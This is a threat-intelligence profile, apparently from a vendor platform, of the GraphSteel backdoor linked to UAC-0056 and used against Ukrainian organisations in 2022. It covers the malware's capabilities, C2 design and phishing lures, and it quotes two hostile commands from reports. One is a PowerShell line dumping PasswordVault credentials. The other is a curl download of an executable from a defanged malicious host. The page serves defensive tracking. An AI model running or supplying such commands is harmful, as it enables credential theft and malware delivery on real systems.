GraphSteel is a Go-based backdoor and data-stealing malware associated with the UAC-0056 intrusion cluster, also tracked as SaintBear, UNC2589, TA471, and Lorec53. It was used in cyberespionage operations targeting Ukrainian organizations during 2022, including campaigns against government and other entities amid the broader conflict environment. GraphSteel commonly appeared alongside the GrimPlant backdoor and, in some infection chains, Cobalt Strike Beacon, suggesting a layered intrusion set designed for redundancy and sustained access.
GraphSteel has been described both as a backdoor and as the client or stealer component of the broader Elephant malware framework. Its functionality includes collecting basic host information, executing commands, stealing credentials, and exfiltrating files and user data. Reported theft targets include browser-stored credentials, Wi-Fi information, Windows Credential Manager or PasswordVault data, mail account data, PuTTY connection data, and FileZilla credentials. It also searches for and uploads documents and other potentially sensitive files from common user directories.
Command-and-control communications use WebSocket and GraphQL, with traffic protected using AES encryption and base64 encoding. Public reporting also describes anti-analysis and evasion measures in the surrounding infection chain, including packing with Themida and staged delivery through multiple Go-based components. Persistence has been established through Windows autorun mechanisms in campaigns that deploy GraphSteel.
Observed delivery methods include spearphishing emails impersonating Ukrainian government bodies, fake security or antivirus update lures, and macro-enabled Excel attachments themed around wage arrears. These campaigns delivered multi-stage loaders and downloaders that ultimately installed GraphSteel and GrimPlant on Windows systems. The malware has been linked with espionage-focused collection against Ukrainian targets and fits a broader pattern of Russian-aligned activity attributed with medium confidence to UAC-0056.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The last payload that the researchers detailed is named elephant_client by the actor. It is also tracked as the GraphSteel backdoor. This final payload is a data stealer, the researchers say.
28 distinct techniques documented for this family, organized by ATT&CK tactic.
The emails were themed as “critical security updates” and contained links to download a fake AV update package.
The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download "critical security updates," which come in the form of a 60 MB file named "BitdefenderWindowsUpdatePackage.exe."
The capabilities of the two tools cover network reconnaissance, command execution, and file operations... Execute commands... Execute commands received remotely and return results to C2
powershell /Q /C -encodedCommand ... [Windows.Security.Credentials.PasswordVault ... RetrieveAll() ... Select UserName, Resource, Password
C:\Windows\System32\cmd.exe /C cd %USERPROFILE%\AppData\Local\Temp\ & curl -O hxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe
EXE-файли (завантажувачі з Discord) захищено протектором Themida ... завантаження, base64-декодування
gets the IP address of the machine by making a request to https://api.ipify.org/
GraphSteel features: Gather hostname, username, and IP address information... GrimPlant capabilities: Gather IP address, hostname, OS, username, home dir
The capabilities of the two tools cover network reconnaissance
the malware collects the hostname, OS name and number of CPUs in the system
Use WebSocket and GraphQL to communicate with C2 using AES and base64 encryption
Use WebSocket and GraphQL to communicate with C2 using AES and base64 encryption... Use gRPC (HTTP/2+SSL) for C2 communication
GraphSteel ... Для комунікації з сервером управління використовується WebSocket та GraphQL
38 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Final-stage backdoor and stealer that decrypts the C2 address, connects to the server, collects host and user data, and steals credentials from browsers, Wi-Fi profiles, Credential Manager, mail accounts, PuTTY, and FileZilla.
Go-based credential and file stealer component of Elephant. Steals credentials using goLazagne-derived code and searches common user folders for sensitive file types (e.g., .key, .crt, .ssh, .ovpn, Office docs, archives) for exfiltration. Communicates to a GraphQL endpoint over WebSockets; messages encrypted with AES; receives session key via a custom RSA-based exchange.
A named malware tool associated with UAC-0056 in attacks on Ukrainian infrastructure.
Go-based backdoor used in the campaign for network reconnaissance, command execution, file operations, credential theft, and C2 communications over WebSocket and GraphQL with AES and base64 encoding.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.